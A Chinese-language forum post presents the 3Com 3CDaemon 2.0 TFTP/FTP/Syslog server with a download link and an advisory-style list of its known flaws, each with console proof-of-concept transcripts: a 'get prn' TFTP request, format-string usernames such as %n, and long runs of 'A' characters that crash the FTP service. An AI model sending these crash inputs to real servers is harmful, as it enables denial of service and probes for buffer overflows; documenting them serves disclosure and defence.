3COM 3CDaemon(TFTP软件)

ceacer · 2月13号

软件标签: 3COM 3CDaemon TFTP

3COM 3CDaemon是一款多重服务器功能集成软件，主要作用于服务器中，同时还能够帮助用户改善相关的电脑功能，需要的用户快来绿色资源网下载吧！

3COM 3CDaemon软件简介：

3com的这款东西还是很有名很不错滴~~~3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序；作用于FTP,TFTP,SYSLOG服务器，TFTP客户端，虽然还存在很多的问题，但是使用起来还是不错的！

3COM 3CDaemon问题详解：

1、TFTP保留设备名拒绝服务攻击

提交类似如下的请求，可导致TFTP服务程序挂起：

D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn

The 3CDaemon will be crashed with some msgs like

"Microsoft Visual C++ Runtime library"

"Runtime Error!"

"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "

"abnormal program termination".

2、FTP用户名存在格式串问题

提交包含格式串字符作为用户名数据，可导致守护程序崩溃：

H:\>ftp 192.168.0.1

Connected to 192.168.0.1.

220 3Com 3CDaemon FTP Server Version 2.0

User (192.168.0.1:(none)): %n

Connection closed by remote host.

OR:

H:\>ftp 192.168.0.1

Connected to 192.168.0.1.

220 3Com 3CDaemon FTP Server Version 2.0

User (192.168.0.1:(none)): %s

331 User name ok, need password

Password:[anythinghere]

530 Login access denied

Login failed.

ftp>

3、FTP超长用户名缓冲区溢出

由于对用户名缺少正确边界缓冲区检查，提交超长用户名可导致缓冲区溢出：

D:\WINDOWS\system32>ftp 192.168.0.1

Connected to 192.168.0.1.

220 3Com 3CDaemon FTP Server Version 2.0

User (192.168.0.1:(none)):

501 Invalid or missing parameters

Login failed.

ftp> user AAA..[about 241 A here]...AAAAA

Connection closed by remote host.

4、多个FTP命令超长参数缓冲区溢出

cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查，提交超长字符串作为命令参数可导致缓冲区溢出：

ftp> cd AAA..[about 398 A here]...AAAAA

Connection closed by remote host.

ftp>

ftp> ls AAA..[about 247 A here]...AAAAA

200 PORT command successful.

Connection closed by remote host.

ftp> put 1.txt AAA..[about 247 A here]...AAAAA

200 PORT command successful.

532 Need account for storing files

Connection closed by remote host.

5、多个FTP命令存在格式串问题

提交格式字符串作为参数，可导致程序崩溃。

6、多个FTP命令包设备名信息泄露问题

请求保留设备名可导致返回程序安装路径信息：

ftp> cd aux

550 aux : C:/3cdaemon/aux is not a directory!

ftp> cd lpt1

550 lpt1 : C:/3cdaemon/lpt1 is not a directory!

受影响系统：

3Com 3CDaemon 2.0 revision 10

下载地址:
https://cdn.chenair.com/b/down2/3cdaemon_downcc.zip

登入

3COM 3CDaemon(TFTP软件)

推荐帖

ceacer 2

3COM 3CDaemon软件简介：

3COM 3CDaemon问题详解：

评论链接

在其他网站上分享

创建账户或登录以发表评论

创建一个帐户

登入

告诉你朋友

浏览

活动

店铺

Support

重要信息